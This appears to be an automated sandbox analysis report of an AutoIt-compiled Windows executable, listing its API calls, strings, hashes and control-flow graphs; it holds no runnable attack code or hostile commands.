                                                                                                                                                                                                                                                            • EnumChildWindows.USER32(00000000), ref: 0046F35D
                                                                                                                                                                                                                                                            • EnumWindows.USER32(0046130D,?), ref: 0046F365
                                                                                                                                                                                                                                                              • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop_memmove
                                                                                                                                                                                                                                                            • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                                                                                                                            • API String ID: 329138477-1919597938
                                                                                                                                                                                                                                                            • Opcode ID: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
                                                                                                                                                                                                                                                            • Instruction ID: 15289122aec5319afe5b60ce0d71565fabc5791e0031d8771947120ab82528ab
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83F10B714143019BDB00FF61D885AAFB3A4BF85308F44496FF94567282E779E909CBA7

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\LKxcbzlwkz.exe,00000104,?), ref: 00401F4C
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00402007
                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 0040201D
                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00402033
                                                                                                                                                                                                                                                              • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00402049
                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 0040207C
                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\LKxcbzlwkz.exe,00000104), ref: 00428B5B
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                                                                                                                                                                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\LKxcbzlwkz.exe$CMDLINE$CMDLINERAW
                                                                                                                                                                                                                                                            • API String ID: 3948761352-214076062
                                                                                                                                                                                                                                                            • Opcode ID: fb742eb3e3b9472f662d9eb0d9266b7c596f0002b12228fde03e2c1a898d0588
                                                                                                                                                                                                                                                            • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb742eb3e3b9472f662d9eb0d9266b7c596f0002b12228fde03e2c1a898d0588
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: __fread_nolock$_fseek_wcscpy
• String ID: D)E$D)E$FILE
• API String ID: 3888824918-361185794
• Opcode ID: c1a842079991e0571ddd3d2373b9fc1db2fff56e847d73cfd386b3e85dd9681d
• Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
• Opcode Fuzzy Hash: c1a842079991e0571ddd3d2373b9fc1db2fff56e847d73cfd386b3e85dd9681d
• Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

Control-flow Graph

APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
• __wsplitpath.LIBCMT ref: 0040E41C
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• _wcsncat.LIBCMT ref: 0040E433
• __wmakepath.LIBCMT ref: 0040E44F
  • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
• _wcscpy.LIBCMT ref: 0040E487
  • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
• _wcscat.LIBCMT ref: 00427541
• _wcslen.LIBCMT ref: 00427551
• _wcslen.LIBCMT ref: 00427562
• _wcscat.LIBCMT ref: 0042757C
• _wcsncpy.LIBCMT ref: 004275BC
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
• String ID: Include$\
• API String ID: 3173733714-3429789819
• Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
• Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
• Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
• Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

Control-flow Graph

APIs
• _fseek.LIBCMT ref: 0045292B
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
• __fread_nolock.LIBCMT ref: 00452961
• __fread_nolock.LIBCMT ref: 00452971
• __fread_nolock.LIBCMT ref: 0045298A
• __fread_nolock.LIBCMT ref: 004529A5
• _fseek.LIBCMT ref: 004529BF
• _malloc.LIBCMT ref: 004529CA
• _malloc.LIBCMT ref: 004529D6
• __fread_nolock.LIBCMT ref: 004529E7
• _free.LIBCMT ref: 00452A17
• _free.LIBCMT ref: 00452A20
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: __fread_nolock$_free_fseek_malloc_wcscpy
• String ID:
• API String ID: 1255752989-0
• Opcode ID: 3b6620f45ba38e4c5fadb777145c18bd0d1596e00bc77684767aaa6d3528f01d
• Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
• Opcode Fuzzy Hash: 3b6620f45ba38e4c5fadb777145c18bd0d1596e00bc77684767aaa6d3528f01d
• Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 004104C3
• RegisterClassExW.USER32(00000030), ref: 004104ED
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
• InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
• LoadIconW.USER32(00400000,000000A9), ref: 00410542
• ImageList_ReplaceIcon.COMCTL32(00B26C98,000000FF,00000000), ref: 00410552
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                            • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                            • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                                                                                                                                                            • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 0041039B
• LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
• LoadIconW.USER32(?,00000063), ref: 004103C0
• LoadIconW.USER32(?,000000A4), ref: 004103D3
• LoadIconW.USER32(?,000000A2), ref: 004103E6
• LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
• RegisterClassExW.USER32(?), ref: 0041045D
  • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
  • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
  • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
  • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
  • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
  • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
  • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00B26C98,000000FF,00000000), ref: 00410552
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
• Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
• Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
• Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98

Control-flow Graph
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BF8D
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: ConnectRegistry_memmove_wcslen
• String ID:
• API String ID: 15295421-0
• Opcode ID: d39b2af1ed21ce13ea9b5c2d4aec4a7f6f547b1900bf74f1e4f00604a748ca0e
• Instruction ID: 33baa24a15bb30b806ffdc3d4c8c2128b8dbdbb38b4108e5c3e965d5e336c96e
• Opcode Fuzzy Hash: d39b2af1ed21ce13ea9b5c2d4aec4a7f6f547b1900bf74f1e4f00604a748ca0e
• Instruction Fuzzy Hash: 89E17471204200ABD714EF69CD85F2BB7E8AF88704F14891EF985DB381D779E941CB9A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: _malloc
• String ID: Default
• API String ID: 1579825452-753088835
• Opcode ID: a3e4b55106fa688c5f94f0146bd267cff11ee882b1dfb7c9286b26d2cf852227
• Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
• Opcode Fuzzy Hash: a3e4b55106fa688c5f94f0146bd267cff11ee882b1dfb7c9286b26d2cf852227
• Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

Control-flow Graph (edge list; legend: Executed / Not Executed)

control_flow_graph 2473 40f5c0-40f5cf call 422240 2476 40f5d0-40f5e8 2473->2476 2476->2476 2477 40f5ea-40f613 call 413650 call 410e60 2476->2477 2482 40f614-40f633 call 414d04 2477->2482 2485 40f691 2482->2485 2486 40f635-40f63c 2482->2486 2487 40f696-40f69c 2485->2487 2488 40f660-40f674 call 4150d1 2486->2488 2489 40f63e 2486->2489 2493 40f679-40f67c 2488->2493 2490 40f640 2489->2490 2492 40f642-40f650 2490->2492 2494 40f652-40f655 2492->2494 2495 40f67e-40f68c 2492->2495 2493->2482 2496 40f65b-40f65e 2494->2496 2497 425d1e-425d3e call 4150d1 call 414d04 2494->2497 2498 40f68e-40f68f 2495->2498 2499 40f69f-40f6ad 2495->2499 2496->2488 2496->2490 2509 425d43-425d5f call 414d30 2497->2509 2498->2494 2500 40f6b4-40f6c2 2499->2500 2501 40f6af-40f6b2 2499->2501 2503 425d16 2500->2503 2504 40f6c8-40f6d6 2500->2504 2501->2494 2503->2497 2506 425d05-425d0b 2504->2506 2507 40f6dc-40f6df 2504->2507 2506->2492 2510 425d11 2506->2510 2507->2494 2509->2487 2510->2503
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: __fread_nolock_fseek_memmove_strcat
• String ID: AU3!$EA06
• API String ID: 1268643489-2658333250
• Opcode ID: 2bf944a422d814460d06cfc7cd8a6c131d3cd46aa2c5a852c72b19ddfb5272df
• Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
• Opcode Fuzzy Hash: 2bf944a422d814460d06cfc7cd8a6c131d3cd46aa2c5a852c72b19ddfb5272df
• Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

Control-flow Graph

APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
• HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
• String ID:
• API String ID: 1291720006-3916222277
• Opcode ID: 94ee1e3e258d452f192cdcaedec96fbb0156848484ac1a69a6464526fb86115e
• Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
• Opcode Fuzzy Hash: 94ee1e3e258d452f192cdcaedec96fbb0156848484ac1a69a6464526fb86115e
• Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 2552 401100-401111 2553 401113-401119 2552->2553 2554 401179-401180 2552->2554 2555 401144-40114a 2553->2555 2556 40111b-40111e 2553->2556 2554->2553 2557 401182 2554->2557 2559 401184-40118e call 401250 2555->2559 2560 40114c-40114f 2555->2560 2556->2555 2558 401120-401126 2556->2558 2561 40112c-401141 DefWindowProcW 2557->2561 2558->2561 2563 42b038-42b03f 2558->2563 2566 401193-40119a 2559->2566 2564 401151-401157 2560->2564 2565 40119d 2560->2565 2563->2561 2571 42b045-42b059 call 401000 call 40e0c0 2563->2571 2569 401219-40121f 2564->2569 2570 40115d 2564->2570 2567 4011a3-4011a9 2565->2567 2568 42afb4-42afc5 call 40f190 2565->2568 2567->2558 2572 4011af 2567->2572 2568->2566 2569->2558 2575 401225-42b06d call 468b0e 2569->2575 2573 401163-401166 2570->2573 2574 42b01d-42b024 2570->2574 2571->2561 2572->2558 2578 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2572->2578 2579 4011db-401202 SetTimer RegisterWindowMessageW 2572->2579 2581 42afe9-42b018 call 40f190 call 401a50 2573->2581 2582 40116c-401172 2573->2582 2574->2561 2580 42b02a-42b033 call 4370f4 2574->2580 2575->2566 2579->2566 2590 401204-401216 CreatePopupMenu 2579->2590 2580->2561 2581->2561 2582->2558 2592 401174-42afde call 45fd57 2582->2592 2592->2561 2603 42afe4 2592->2603 2603->2566
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                                                                                                                                                                            • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00401204
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                            • String ID: TaskbarCreated
                                                                                                                                                                                                                                                            • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                            • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                                                                                                                                                                                                            • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
APIs
• _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
• std::exception::exception.LIBCMT ref: 00411626
• std::exception::exception.LIBCMT ref: 00411640
• __CxxThrowException@8.LIBCMT ref: 00411651
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
• String ID: ,*H$4*H$@fI
• API String ID: 615853336-1459471987
• Opcode ID: 82e626e187fd93f0b78ce583db7f2dc4e80f05ba1730a5b6497a9883058244d9
